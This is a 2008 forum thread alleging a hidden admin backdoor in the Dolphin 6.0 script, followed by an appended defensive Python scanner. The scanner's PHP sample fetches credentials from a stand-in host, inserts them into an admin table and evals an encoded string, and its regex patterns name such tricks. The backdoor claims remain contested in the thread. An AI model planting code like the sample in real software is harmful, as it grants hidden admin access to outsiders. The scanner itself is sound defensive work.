A very serious security issue in version 6.0

dddd posted 4th of June 2008 in Community Voice. 6 comments.

There is a very serious security issue in version 6.0 of dolphin.

I am not sure if it's changed in recent versions, but it requires immediate action.

I have started a blog on Dolphin issues and am posting it there.

Please have a look

My blog on Dolphin issues

Comments
AndreyP
Hello, we don't have such embedded code. I rechecked all revisions since 6.0, and we don't have any such code.

It seems only you have such code.

Regards
SergeyZ
Hello!

Do not worry about this code. It was only in beta versions just for testing issues. It was removed in final release. Please upgrade your copy of Dolphin to the newer, more stable version. I recommend 6.1.1. ;)

Best Regards.

Sergey Z., Official Dolphin Developer.
tango3d
I have saved all previous downloads of the Dolphin script. I have scanned all of them and found the same code here: Dolphin-v.6.0.0003-AdFree.zip
mscott
Let me translate what SergeyZ is saying... if you are using the older versions you DO have a backdoor!? I checked and it IS there!?
gameutopia
This is interesting, because I didn't know that my 6.03 version was a beta release version. And yes, the code is definitely in 6.03.

I sure hope someone doesn't later post some decoded code that does something similar in 6.1x. I have noticed a number of encoded characters in 6.1x that I am not really sure what they do. I would be a little disappointed if any of it turned out to be something similar.

I am not ready to upgrade to 6.1.1 for a live site. I'd take the 6.03 I've been playing with over 6.1.1 for stability any day. I haven't had a single problem with it. I tried 6.1.1 and had a number of issues. Even reading the forums and blogs I see a lot of upgrade problems, which makes me want to hold off a while yet. I'll continue testing it, but won't use it on a live site until a few things get fixed and worked out.
dddd
I think Boonex guys should honestly admit this. This code is obviously reading a file with admin login and pwd from their Boonex site and inserting it into your admin table. As you all know, an admin can do whatever he wants.

I think their solution was not that smart, because they left one line of SQL visible which inserts into the admin table. Actually it is possible to do it in much smarter ways which are much more difficult to detect and claim.

I don't know how it is in the latest versions. I have no time to check newer versions, but if I find anything I am planning to post the details in my Dolphin blog:

http://english.youshare.jp/blogs.php?action=show_member_blog&ownerID=15&category=32&cPath=32&blogID=7
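The commenters describe two things worth scanning an installed copy for: a remote fetch whose result ends up in an INSERT into the admin table, and encoded blobs fed to eval. The following scanner is an added example for defenders, not code from this thread or from Boonex; the indicator patterns are assumed heuristics, and the PHP sample it runs on is constructed to have the shape described above, not Dolphin's actual code.

```python
import re

# Indicator patterns (assumed heuristics, not vendor signatures), tagged by what each suggests.
PATTERNS = {
    "remote_fetch": re.compile(r"(file_get_contents|fopen|curl_init|fsockopen)\s*\(\s*['\"]https?://", re.I),
    "admin_insert": re.compile(r"insert\s+into\s+`?\w*admin\w*`?", re.I),
    "encoded_exec": re.compile(r"\b(eval|assert|preg_replace)\s*\(.*(base64_decode|gzinflate|str_rot13|gzuncompress)", re.I),
    "long_base64": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}

def scan_php(source: str):
    """Return (line_no, indicator, truncated line) for every line matching an indicator."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        for name, pat in PATTERNS.items():
            if pat.search(line):
                hits.append((no, name, line.strip()[:80]))
    return hits

def assess(hits):
    """Escalate when a remote fetch and an admin-table INSERT both appear in one file:
    that pairing is what the thread describes (credentials pulled from a vendor site
    and written into the admin table). Encoded/eval'd blobs alone are only suspicious."""
    kinds = {h[1] for h in hits}
    if {"remote_fetch", "admin_insert"} <= kinds:
        return "critical"
    if "encoded_exec" in kinds or "long_base64" in kinds:
        return "suspicious"
    return "clean"

# Constructed sample: a hypothetical snippet in the shape the commenters describe, not Dolphin's code.
SAMPLE = r"""<?php
$c = file_get_contents('http://vendor.example/creds.txt');
list($u, $p) = explode(':', $c);
mysql_query("INSERT INTO `Admins` (`Name`, `Password`) VALUES ('$u', '$p')");
eval(base64_decode('ZWNobyAnaGknOw=='));
"""

if __name__ == "__main__":
    found = scan_php(SAMPLE)
    for no, kind, text in found:
        print(f"line {no}: {kind}: {text}")
    print("verdict:", assess(found))
```

Run it over each .php file of an install (for example with `os.walk`) and review every "critical" and "suspicious" file by hand; the patterns produce false positives on legitimate code, so they are a triage aid, not a verdict.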